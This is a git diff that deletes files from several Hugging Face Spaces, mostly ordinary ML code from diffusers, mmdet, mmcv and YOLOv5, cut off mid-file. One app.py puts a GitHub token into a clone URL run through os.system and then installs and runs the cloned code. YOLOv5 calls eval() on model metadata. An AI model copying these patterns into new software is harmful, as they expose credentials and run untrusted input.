if the code commented as a copy in `filename` matches the original. - Return the differences or overwrites the content depending on `overwrite`. - """ - with open(filename, "r", encoding="utf-8", newline="\n") as f: - lines = f.readlines() - diffs = [] - line_index = 0 - # Not a for loop cause `lines` is going to change (if `overwrite=True`). - while line_index < len(lines): - search = _re_copy_warning.search(lines[line_index]) - if search is None: - line_index += 1 - continue - - # There is some copied code here, let's retrieve the original. - indent, object_name, replace_pattern = search.groups() - theoretical_code = find_code_in_diffusers(object_name) - theoretical_indent = get_indent(theoretical_code) - - start_index = line_index + 1 if indent == theoretical_indent else line_index + 2 - indent = theoretical_indent - line_index = start_index - - # Loop to check the observed code, stop when indentation diminishes or if we see a End copy comment. - should_continue = True - while line_index < len(lines) and should_continue: - line_index += 1 - if line_index >= len(lines): - break - line = lines[line_index] - should_continue = _should_continue(line, indent) and re.search(f"^{indent}# End copy", line) is None - # Clean up empty lines at the end (if any). - while len(lines[line_index - 1]) <= 1: - line_index -= 1 - - observed_code_lines = lines[start_index:line_index] - observed_code = "".join(observed_code_lines) - - # Remove any nested `Copied from` comments to avoid circular copies - theoretical_code = [line for line in theoretical_code.split("\n") if _re_copy_warning.search(line) is None] - theoretical_code = "\n".join(theoretical_code) - - # Before comparing, use the `replace_pattern` on the original code. - if len(replace_pattern) > 0: - patterns = replace_pattern.replace("with", "").split(",") - patterns = [_re_replace_pattern.search(p) for p in patterns] - for pattern in patterns: - if pattern is None: - continue - obj1, obj2, option = pattern.groups() - theoretical_code = re.sub(obj1, obj2, theoretical_code) - if option.strip() == "all-casing": - theoretical_code = re.sub(obj1.lower(), obj2.lower(), theoretical_code) - theoretical_code = re.sub(obj1.upper(), obj2.upper(), theoretical_code) - - # Blackify after replacement. To be able to do that, we need the header (class or function definition) - # from the previous line - theoretical_code = blackify(lines[start_index - 1] + theoretical_code) - theoretical_code = theoretical_code[len(lines[start_index - 1]) :] - - # Test for a diff and act accordingly. - if observed_code != theoretical_code: - diffs.append([object_name, start_index]) - if overwrite: - lines = lines[:start_index] + [theoretical_code] + lines[line_index:] - line_index = start_index + 1 - - if overwrite and len(diffs) > 0: - # Warn the user a file has been modified. - print(f"Detected changes, rewriting {filename}.") - with open(filename, "w", encoding="utf-8", newline="\n") as f: - f.writelines(lines) - return diffs - - -def check_copies(overwrite: bool = False): - all_files = glob.glob(os.path.join(DIFFUSERS_PATH, "**/*.py"), recursive=True) - diffs = [] - for filename in all_files: - new_diffs = is_copy_consistent(filename, overwrite) - diffs += [f"- {filename}: copy does not match {d[0]} at line {d[1]}" for d in new_diffs] - if not overwrite and len(diffs) > 0: - diff = "\n".join(diffs) - raise Exception( - "Found the following copy inconsistencies:\n" - + diff - + "\nRun `make fix-copies` or `python utils/check_copies.py --fix_and_overwrite` to fix them." - ) - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--fix_and_overwrite", action="store_true", help="Whether to fix inconsistencies.") - args = parser.parse_args() - - check_copies(args.fix_and_overwrite) diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py deleted file mode 100644 index e10cc14afac4ddfcb9395c1a250ece1fbfe3263c..0000000000000000000000000000000000000000 --- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py +++ /dev/null @@ -1,145 +0,0 @@ -import torch - -from ..builder import BBOX_ASSIGNERS -from ..match_costs import build_match_cost -from ..transforms import bbox_cxcywh_to_xyxy -from .assign_result import AssignResult -from .base_assigner import BaseAssigner - -try: - from scipy.optimize import linear_sum_assignment -except ImportError: - linear_sum_assignment = None - - -@BBOX_ASSIGNERS.register_module() -class HungarianAssigner(BaseAssigner): - """Computes one-to-one matching between predictions and ground truth. - - This class computes an assignment between the targets and the predictions - based on the costs. The costs are weighted sum of three components: - classification cost, regression L1 cost and regression iou cost. The - targets don't include the no_object, so generally there are more - predictions than targets. After the one-to-one matching, the un-matched - are treated as backgrounds. Thus each query prediction will be assigned - with `0` or a positive integer indicating the ground truth index: - - - 0: negative sample, no assigned gt - - positive integer: positive sample, index (1-based) of assigned gt - - Args: - cls_weight (int | float, optional): The scale factor for classification - cost. Default 1.0. - bbox_weight (int | float, optional): The scale factor for regression - L1 cost. Default 1.0. - iou_weight (int | float, optional): The scale factor for regression - iou cost. Default 1.0. - iou_calculator (dict | optional): The config for the iou calculation. - Default type `BboxOverlaps2D`. - iou_mode (str | optional): "iou" (intersection over union), "iof" - (intersection over foreground), or "giou" (generalized - intersection over union). Default "giou". - """ - - def __init__(self, - cls_cost=dict(type='ClassificationCost', weight=1.), - reg_cost=dict(type='BBoxL1Cost', weight=1.0), - iou_cost=dict(type='IoUCost', iou_mode='giou', weight=1.0)): - self.cls_cost = build_match_cost(cls_cost) - self.reg_cost = build_match_cost(reg_cost) - self.iou_cost = build_match_cost(iou_cost) - - def assign(self, - bbox_pred, - cls_pred, - gt_bboxes, - gt_labels, - img_meta, - gt_bboxes_ignore=None, - eps=1e-7): - """Computes one-to-one matching based on the weighted costs. - - This method assign each query prediction to a ground truth or - background. The `assigned_gt_inds` with -1 means don't care, - 0 means negative sample, and positive number is the index (1-based) - of assigned gt. - The assignment is done in the following steps, the order matters. - - 1. assign every prediction to -1 - 2. compute the weighted costs - 3. do Hungarian matching on CPU based on the costs - 4. assign all to 0 (background) first, then for each matched pair - between predictions and gts, treat this prediction as foreground - and assign the corresponding gt index (plus 1) to it. - - Args: - bbox_pred (Tensor): Predicted boxes with normalized coordinates - (cx, cy, w, h), which are all in range [0, 1]. Shape - [num_query, 4]. - cls_pred (Tensor): Predicted classification logits, shape - [num_query, num_class]. - gt_bboxes (Tensor): Ground truth boxes with unnormalized - coordinates (x1, y1, x2, y2). Shape [num_gt, 4]. - gt_labels (Tensor): Label of `gt_bboxes`, shape (num_gt,). - img_meta (dict): Meta information for current image. - gt_bboxes_ignore (Tensor, optional): Ground truth bboxes that are - labelled as `ignored`. Default None. - eps (int | float, optional): A value added to the denominator for - numerical stability. Default 1e-7. - - Returns: - :obj:`AssignResult`: The assigned result. - """ - assert gt_bboxes_ignore is None, \ - 'Only case when gt_bboxes_ignore is None is supported.' - num_gts, num_bboxes = gt_bboxes.size(0), bbox_pred.size(0) - - # 1. assign -1 by default - assigned_gt_inds = bbox_pred.new_full((num_bboxes, ), - -1, - dtype=torch.long) - assigned_labels = bbox_pred.new_full((num_bboxes, ), - -1, - dtype=torch.long) - if num_gts == 0 or num_bboxes == 0: - # No ground truth or boxes, return empty assignment - if num_gts == 0: - # No ground truth, assign all to background - assigned_gt_inds[:] = 0 - return AssignResult( - num_gts, assigned_gt_inds, None, labels=assigned_labels) - img_h, img_w, _ = img_meta['img_shape'] - factor = gt_bboxes.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0) - - # 2. compute the weighted costs - # classification and bboxcost. - cls_cost = self.cls_cost(cls_pred, gt_labels) - # regression L1 cost - normalize_gt_bboxes = gt_bboxes / factor - reg_cost = self.reg_cost(bbox_pred, normalize_gt_bboxes) - # regression iou cost, defaultly giou is used in official DETR. - bboxes = bbox_cxcywh_to_xyxy(bbox_pred) * factor - iou_cost = self.iou_cost(bboxes, gt_bboxes) - # weighted sum of above three costs - cost = cls_cost + reg_cost + iou_cost - - # 3. do Hungarian matching on CPU using linear_sum_assignment - cost = cost.detach().cpu() - if linear_sum_assignment is None: - raise ImportError('Please run "pip install scipy" ' - 'to install scipy first.') - matched_row_inds, matched_col_inds = linear_sum_assignment(cost) - matched_row_inds = torch.from_numpy(matched_row_inds).to( - bbox_pred.device) - matched_col_inds = torch.from_numpy(matched_col_inds).to( - bbox_pred.device) - - # 4. assign backgrounds and foregrounds - # assign all indices to backgrounds first - assigned_gt_inds[:] = 0 - # assign foregrounds based on matching results - assigned_gt_inds[matched_row_inds] = matched_col_inds + 1 - assigned_labels[matched_row_inds] = gt_labels[matched_col_inds] - return AssignResult( - num_gts, assigned_gt_inds, None, labels=assigned_labels) diff --git a/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py b/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py deleted file mode 100644 index 318845de1e2124a4dff3348749ec5a13d78d686f..0000000000000000000000000000000000000000 --- a/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py +++ /dev/null @@ -1,10 +0,0 @@ -_base_ = [ - '../_base_/models/deeplabv3plus_r50-d8.py', - '../_base_/datasets/pascal_context.py', '../_base_/default_runtime.py', - '../_base_/schedules/schedule_40k.py' -] -model = dict( - decode_head=dict(num_classes=60), - auxiliary_head=dict(num_classes=60), - test_cfg=dict(mode='slide', crop_size=(480, 480), stride=(320, 320))) -optimizer = dict(type='SGD', lr=0.004, momentum=0.9, weight_decay=0.0001) diff --git a/spaces/AnnonSubmission/xai-cl/README.md b/spaces/AnnonSubmission/xai-cl/README.md deleted file mode 100644 index b196cbedb3e6604ddd8182d2a0f0978d92fc139d..0000000000000000000000000000000000000000 --- a/spaces/AnnonSubmission/xai-cl/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Xai Cl -emoji: 🏢 -colorFrom: gray -colorTo: red -sdk: gradio -sdk_version: 3.10.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py b/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py deleted file mode 100644 index 572ad0b5860a938796ac7f8018535570db0ca166..0000000000000000000000000000000000000000 --- a/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py +++ /dev/null @@ -1,17 +0,0 @@ -import os - - -github_user = os.environ.get("GITHUB_USER") -github_token = os.environ.get("GITHUB_TOKEN") - -repo_name = "annotation-ai/mlwiz-technical-demo" - -os.system(f"export GITHUB_USER={github_user}") -os.system(f"export GITHUB_TOKEN={github_token}") -os.system(f"git clone https://{github_user}:{github_token}@github.com/{repo_name}") - -cwd0 = os.getcwd() -cwd1 = os.path.join(cwd0, "mlwiz-technical-demo/sam") -os.chdir(cwd1) -os.system("pip install -r requirements.txt") -os.system("python app_everything_img.py") diff --git a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py b/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py deleted file mode 100644 index d0466847c6e5c1239e359a0397568413ebc1504a..0000000000000000000000000000000000000000 --- a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import torch -from torch.autograd import Function - -from ..utils import ext_loader - -ext_module = ext_loader.load_ext('_ext', ['ball_query_forward']) - - -class BallQuery(Function): - """Find nearby points in spherical space.""" - - @staticmethod - def forward(ctx, min_radius: float, max_radius: float, sample_num: int, - xyz: torch.Tensor, center_xyz: torch.Tensor) -> torch.Tensor: - """ - Args: - min_radius (float): minimum radius of the balls. - max_radius (float): maximum radius of the balls. - sample_num (int): maximum number of features in the balls. - xyz (Tensor): (B, N, 3) xyz coordinates of the features. - center_xyz (Tensor): (B, npoint, 3) centers of the ball query. - - Returns: - Tensor: (B, npoint, nsample) tensor with the indices of - the features that form the query balls. - """ - assert center_xyz.is_contiguous() - assert xyz.is_contiguous() - assert min_radius < max_radius - - B, N, _ = xyz.size() - npoint = center_xyz.size(1) - idx = xyz.new_zeros(B, npoint, sample_num, dtype=torch.int) - - ext_module.ball_query_forward( - center_xyz, - xyz, - idx, - b=B, - n=N, - m=npoint, - min_radius=min_radius, - max_radius=max_radius, - nsample=sample_num) - if torch.__version__ != 'parrots': - ctx.mark_non_differentiable(idx) - return idx - - @staticmethod - def backward(ctx, a=None): - return None, None, None, None - - -ball_query = BallQuery.apply diff --git a/spaces/Ariharasudhan/YoloV5/models/common.py b/spaces/Ariharasudhan/YoloV5/models/common.py deleted file mode 100644 index 64f1b9354225a69b3fcd977ad3647a9ece141bfe..0000000000000000000000000000000000000000 --- a/spaces/Ariharasudhan/YoloV5/models/common.py +++ /dev/null @@ -1,860 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Common modules -""" - -import ast -import contextlib -import json -import math -import platform -import warnings -import zipfile -from collections import OrderedDict, namedtuple -from copy import copy -from pathlib import Path -from urllib.parse import urlparse - -import cv2 -import numpy as np -import pandas as pd -import requests -import torch -import torch.nn as nn -from IPython.display import display -from PIL import Image -from torch.cuda import amp - -from utils import TryExcept -from utils.dataloaders import exif_transpose, letterbox -from utils.general import (LOGGER, ROOT, Profile, check_requirements, check_suffix, check_version, colorstr, - increment_path, is_notebook, make_divisible, non_max_suppression, scale_boxes, xywh2xyxy, - xyxy2xywh, yaml_load) -from utils.plots import Annotator, colors, save_one_box -from utils.torch_utils import copy_attr, smart_inference_mode - - -def autopad(k, p=None, d=1): # kernel, padding, dilation - # Pad to 'same' shape outputs - if d > 1: - k = d * (k - 1) + 1 if isinstance(k, int) else [d * (x - 1) + 1 for x in k] # actual kernel-size - if p is None: - p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad - return p - - -class Conv(nn.Module): - # Standard convolution with args(ch_in, ch_out, kernel, stride, padding, groups, dilation, activation) - default_act = nn.SiLU() # default activation - - def __init__(self, c1, c2, k=1, s=1, p=None, g=1, d=1, act=True): - super().__init__() - self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p, d), groups=g, dilation=d, bias=False) - self.bn = nn.BatchNorm2d(c2) - self.act = self.default_act if act is True else act if isinstance(act, nn.Module) else nn.Identity() - - def forward(self, x): - return self.act(self.bn(self.conv(x))) - - def forward_fuse(self, x): - return self.act(self.conv(x)) - - -class DWConv(Conv): - # Depth-wise convolution - def __init__(self, c1, c2, k=1, s=1, d=1, act=True): # ch_in, ch_out, kernel, stride, dilation, activation - super().__init__(c1, c2, k, s, g=math.gcd(c1, c2), d=d, act=act) - - -class DWConvTranspose2d(nn.ConvTranspose2d): - # Depth-wise transpose convolution - def __init__(self, c1, c2, k=1, s=1, p1=0, p2=0): # ch_in, ch_out, kernel, stride, padding, padding_out - super().__init__(c1, c2, k, s, p1, p2, groups=math.gcd(c1, c2)) - - -class TransformerLayer(nn.Module): - # Transformer layer https://arxiv.org/abs/2010.11929 (LayerNorm layers removed for better performance) - def __init__(self, c, num_heads): - super().__init__() - self.q = nn.Linear(c, c, bias=False) - self.k = nn.Linear(c, c, bias=False) - self.v = nn.Linear(c, c, bias=False) - self.ma = nn.MultiheadAttention(embed_dim=c, num_heads=num_heads) - self.fc1 = nn.Linear(c, c, bias=False) - self.fc2 = nn.Linear(c, c, bias=False) - - def forward(self, x): - x = self.ma(self.q(x), self.k(x), self.v(x))[0] + x - x = self.fc2(self.fc1(x)) + x - return x - - -class TransformerBlock(nn.Module): - # Vision Transformer https://arxiv.org/abs/2010.11929 - def __init__(self, c1, c2, num_heads, num_layers): - super().__init__() - self.conv = None - if c1 != c2: - self.conv = Conv(c1, c2) - self.linear = nn.Linear(c2, c2) # learnable position embedding - self.tr = nn.Sequential(*(TransformerLayer(c2, num_heads) for _ in range(num_layers))) - self.c2 = c2 - - def forward(self, x): - if self.conv is not None: - x = self.conv(x) - b, _, w, h = x.shape - p = x.flatten(2).permute(2, 0, 1) - return self.tr(p + self.linear(p)).permute(1, 2, 0).reshape(b, self.c2, w, h) - - -class Bottleneck(nn.Module): - # Standard bottleneck - def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_, c2, 3, 1, g=g) - self.add = shortcut and c1 == c2 - - def forward(self, x): - return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x)) - - -class BottleneckCSP(nn.Module): - # CSP Bottleneck https://github.com/WongKinYiu/CrossStagePartialNetworks - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False) - self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False) - self.cv4 = Conv(2 * c_, c2, 1, 1) - self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3) - self.act = nn.SiLU() - self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n))) - - def forward(self, x): - y1 = self.cv3(self.m(self.cv1(x))) - y2 = self.cv2(x) - return self.cv4(self.act(self.bn(torch.cat((y1, y2), 1)))) - - -class CrossConv(nn.Module): - # Cross Convolution Downsample - def __init__(self, c1, c2, k=3, s=1, g=1, e=1.0, shortcut=False): - # ch_in, ch_out, kernel, stride, groups, expansion, shortcut - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, (1, k), (1, s)) - self.cv2 = Conv(c_, c2, (k, 1), (s, 1), g=g) - self.add = shortcut and c1 == c2 - - def forward(self, x): - return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x)) - - -class C3(nn.Module): - # CSP Bottleneck with 3 convolutions - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c1, c_, 1, 1) - self.cv3 = Conv(2 * c_, c2, 1) # optional act=FReLU(c2) - self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n))) - - def forward(self, x): - return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), 1)) - - -class C3x(C3): - # C3 module with cross-convolutions - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = nn.Sequential(*(CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n))) - - -class C3TR(C3): - # C3 module with TransformerBlock() - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = TransformerBlock(c_, c_, 4, n) - - -class C3SPP(C3): - # C3 module with SPP() - def __init__(self, c1, c2, k=(5, 9, 13), n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = SPP(c_, c_, k) - - -class C3Ghost(C3): - # C3 module with GhostBottleneck() - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) # hidden channels - self.m = nn.Sequential(*(GhostBottleneck(c_, c_) for _ in range(n))) - - -class SPP(nn.Module): - # Spatial Pyramid Pooling (SPP) layer https://arxiv.org/abs/1406.4729 - def __init__(self, c1, c2, k=(5, 9, 13)): - super().__init__() - c_ = c1 // 2 # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1) - self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k]) - - def forward(self, x): - x = self.cv1(x) - with warnings.catch_warnings(): - warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning - return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1)) - - -class SPPF(nn.Module): - # Spatial Pyramid Pooling - Fast (SPPF) layer for YOLOv5 by Glenn Jocher - def __init__(self, c1, c2, k=5): # equivalent to SPP(k=(5, 9, 13)) - super().__init__() - c_ = c1 // 2 # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_ * 4, c2, 1, 1) - self.m = nn.MaxPool2d(kernel_size=k, stride=1, padding=k // 2) - - def forward(self, x): - x = self.cv1(x) - with warnings.catch_warnings(): - warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning - y1 = self.m(x) - y2 = self.m(y1) - return self.cv2(torch.cat((x, y1, y2, self.m(y2)), 1)) - - -class Focus(nn.Module): - # Focus wh information into c-space - def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups - super().__init__() - self.conv = Conv(c1 * 4, c2, k, s, p, g, act=act) - # self.contract = Contract(gain=2) - - def forward(self, x): # x(b,c,w,h) -> y(b,4c,w/2,h/2) - return self.conv(torch.cat((x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]), 1)) - # return self.conv(self.contract(x)) - - -class GhostConv(nn.Module): - # Ghost Convolution https://github.com/huawei-noah/ghostnet - def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups - super().__init__() - c_ = c2 // 2 # hidden channels - self.cv1 = Conv(c1, c_, k, s, None, g, act=act) - self.cv2 = Conv(c_, c_, 5, 1, None, c_, act=act) - - def forward(self, x): - y = self.cv1(x) - return torch.cat((y, self.cv2(y)), 1) - - -class GhostBottleneck(nn.Module): - # Ghost Bottleneck https://github.com/huawei-noah/ghostnet - def __init__(self, c1, c2, k=3, s=1): # ch_in, ch_out, kernel, stride - super().__init__() - c_ = c2 // 2 - self.conv = nn.Sequential( - GhostConv(c1, c_, 1, 1), # pw - DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw - GhostConv(c_, c2, 1, 1, act=False)) # pw-linear - self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False), Conv(c1, c2, 1, 1, - act=False)) if s == 2 else nn.Identity() - - def forward(self, x): - return self.conv(x) + self.shortcut(x) - - -class Contract(nn.Module): - # Contract width-height into channels, i.e. x(1,64,80,80) to x(1,256,40,40) - def __init__(self, gain=2): - super().__init__() - self.gain = gain - - def forward(self, x): - b, c, h, w = x.size() # assert (h / s == 0) and (W / s == 0), 'Indivisible gain' - s = self.gain - x = x.view(b, c, h // s, s, w // s, s) # x(1,64,40,2,40,2) - x = x.permute(0, 3, 5, 1, 2, 4).contiguous() # x(1,2,2,64,40,40) - return x.view(b, c * s * s, h // s, w // s) # x(1,256,40,40) - - -class Expand(nn.Module): - # Expand channels into width-height, i.e. x(1,64,80,80) to x(1,16,160,160) - def __init__(self, gain=2): - super().__init__() - self.gain = gain - - def forward(self, x): - b, c, h, w = x.size() # assert C / s ** 2 == 0, 'Indivisible gain' - s = self.gain - x = x.view(b, s, s, c // s ** 2, h, w) # x(1,2,2,16,80,80) - x = x.permute(0, 3, 4, 1, 5, 2).contiguous() # x(1,16,80,2,80,2) - return x.view(b, c // s ** 2, h * s, w * s) # x(1,16,160,160) - - -class Concat(nn.Module): - # Concatenate a list of tensors along dimension - def __init__(self, dimension=1): - super().__init__() - self.d = dimension - - def forward(self, x): - return torch.cat(x, self.d) - - -class DetectMultiBackend(nn.Module): - # YOLOv5 MultiBackend class for python inference on various backends - def __init__(self, weights='yolov5s.pt', device=torch.device('cpu'), dnn=False, data=None, fp16=False, fuse=True): - # Usage: - # PyTorch: weights = *.pt - # TorchScript: *.torchscript - # ONNX Runtime: *.onnx - # ONNX OpenCV DNN: *.onnx --dnn - # OpenVINO: *_openvino_model - # CoreML: *.mlmodel - # TensorRT: *.engine - # TensorFlow SavedModel: *_saved_model - # TensorFlow GraphDef: *.pb - # TensorFlow Lite: *.tflite - # TensorFlow Edge TPU: *_edgetpu.tflite - # PaddlePaddle: *_paddle_model - from models.experimental import attempt_download, attempt_load # scoped to avoid circular import - - super().__init__() - w = str(weights[0] if isinstance(weights, list) else weights) - pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, paddle, triton = self._model_type(w) - fp16 &= pt or jit or onnx or engine # FP16 - nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) - stride = 32 # default stride - cuda = torch.cuda.is_available() and device.type != 'cpu' # use CUDA - if not (pt or triton): - w = attempt_download(w) # download if not local - - if pt: # PyTorch - model = attempt_load(weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse) - stride = max(int(model.stride.max()), 32) # model stride - names = model.module.names if hasattr(model, 'module') else model.names # get class names - model.half() if fp16 else model.float() - self.model = model # explicitly assign for to(), cpu(), cuda(), half() - elif jit: # TorchScript - LOGGER.info(f'Loading {w} for TorchScript inference...') - extra_files = {'config.txt': ''} # model metadata - model = torch.jit.load(w, _extra_files=extra_files, map_location=device) - model.half() if fp16 else model.float() - if extra_files['config.txt']: # load metadata dict - d = json.loads(extra_files['config.txt'], - object_hook=lambda d: {int(k) if k.isdigit() else k: v - for k, v in d.items()}) - stride, names = int(d['stride']), d['names'] - elif dnn: # ONNX OpenCV DNN - LOGGER.info(f'Loading {w} for ONNX OpenCV DNN inference...') - check_requirements('opencv-python>=4.5.4') - net = cv2.dnn.readNetFromONNX(w) - elif onnx: # ONNX Runtime - LOGGER.info(f'Loading {w} for ONNX Runtime inference...') - check_requirements(('onnx', 'onnxruntime-gpu' if cuda else 'onnxruntime')) - import onnxruntime - providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] if cuda else ['CPUExecutionProvider'] - session = onnxruntime.InferenceSession(w, providers=providers) - output_names = [x.name for x in session.get_outputs()] - meta = session.get_modelmeta().custom_metadata_map # metadata - if 'stride' in meta: - stride, names = int(meta['stride']), eval(meta['names']) - elif xml: # OpenVINO - LOGGER.info(f'Loading {w} for OpenVINO inference...') - check_requirements('openvino') # requires openvino-dev: https://pypi.org/project/openvino-dev/ - from openvino.runtime import Core, Layout, get_batch - ie = Core() - if not Path(w).is_file(): # if not *.xml - w = next(Path(w).glob('*.xml')) # get *.xml file from *_openvino_model dir - network = ie.read_model(model=w, weights=Path(w).with_suffix('.bin')) - if network.get_parameters()[0].get_layout().empty: - network.get_parameters()[0].set_layout(Layout("NCHW")) - batch_dim = get_batch(network) - if batch_dim.is_static: - batch_size = batch_dim.get_length() - executable_network = ie.compile_model(network, device_name="CPU") # device_name="MYRIAD" for Intel NCS2 - stride, names = self._load_metadata(Path(w).with_suffix('.yaml')) # load metadata - elif engine: # TensorRT - LOGGER.info(f'Loading {w} for TensorRT inference...') - import tensorrt as trt # https://developer.nvidia.com/nvidia-tensorrt-download - check_version(trt.__version__, '7.0.0', hard=True) # require tensorrt>=7.0.0 - if device.type == 'cpu': - device = torch.device('cuda:0') - Binding = namedtuple('Binding', ('name', 'dtype', 'shape', 'data', 'ptr')) - logger = trt.Logger(trt.Logger.INFO) - with open(w, 'rb') as f, trt.Runtime(logger) as runtime: - model = runtime.deserialize_cuda_engine(f.read()) - context = model.create_execution_context() - bindings = OrderedDict() - output_names = [] - fp16 = False # default updated below - dynamic = False - for i in range(model.num_bindings): - name = model.get_binding_name(i) - dtype = trt.nptype(model.get_binding_dtype(i)) - if model.binding_is_input(i): - if -1 in tuple(model.get_binding_shape(i)): # dynamic - dynamic = True - context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[2])) - if dtype == np.float16: - fp16 = True - else: # output - output_names.append(name) - shape = tuple(context.get_binding_shape(i)) - im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) - bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) - binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) - batch_size = bindings['images'].shape[0] # if dynamic, this is instead max batch size - elif coreml: # CoreML - LOGGER.info(f'Loading {w} for CoreML inference...') - import coremltools as ct - model = ct.models.MLModel(w) - elif saved_model: # TF SavedModel - LOGGER.info(f'Loading {w} for TensorFlow SavedModel inference...') - import tensorflow as tf - keras = False # assume TF1 saved_model - model = tf.keras.models.load_model(w) if keras else tf.saved_model.load(w) - elif pb: # GraphDef https://www.tensorflow.org/guide/migrate#a_graphpb_or_graphpbtxt - LOGGER.info(f'Loading {w} for TensorFlow GraphDef inference...') - import tensorflow as tf - - def wrap_frozen_graph(gd, inputs, outputs): - x = tf.compat.v1.wrap_function(lambda: tf.compat.v1.import_graph_def(gd, name=""), []) # wrapped - ge = x.graph.as_graph_element - return x.prune(tf.nest.map_structure(ge, inputs), tf.nest.map_structure(ge, outputs)) - - def gd_outputs(gd): - name_list, input_list = [], [] - for node in gd.node: # tensorflow.core.framework.node_def_pb2.NodeDef - name_list.append(node.name) - input_list.extend(node.input) - return sorted(f'{x}:0' for x in list(set(name_list) - set(input_list)) if not x.startswith('NoOp')) - - gd = tf.Graph().as_graph_def() # TF GraphDef - with open(w, 'rb') as f: - gd.ParseFromString(f.read()) - frozen_func = wrap_frozen_graph(gd, inputs="x:0", outputs=gd_outputs(gd)) - elif tflite or edgetpu: # https://www.tensorflow.org/lite/guide/python#install_tensorflow_lite_for_python - try: # https://coral.ai/docs/edgetpu/tflite-python/#update-existing-tf-lite-code-for-the-edge-tpu - from tflite_runtime.interpreter import Interpreter, load_delegate - except ImportError: - import tensorflow as tf - Interpreter, load_delegate = tf.lite.Interpreter, tf.lite.experimental.load_delegate, - if edgetpu: # TF Edge TPU https://coral.ai/software/#edgetpu-runtime - LOGGER.info(f'Loading {w} for TensorFlow Lite Edge TPU inference...') - delegate = { - 'Linux': 'libedgetpu.so.1', - 'Darwin': 'libedgetpu.1.dylib', - 'Windows': 'edgetpu.dll'}[platform.system()] - interpreter = Interpreter(model_path=w, 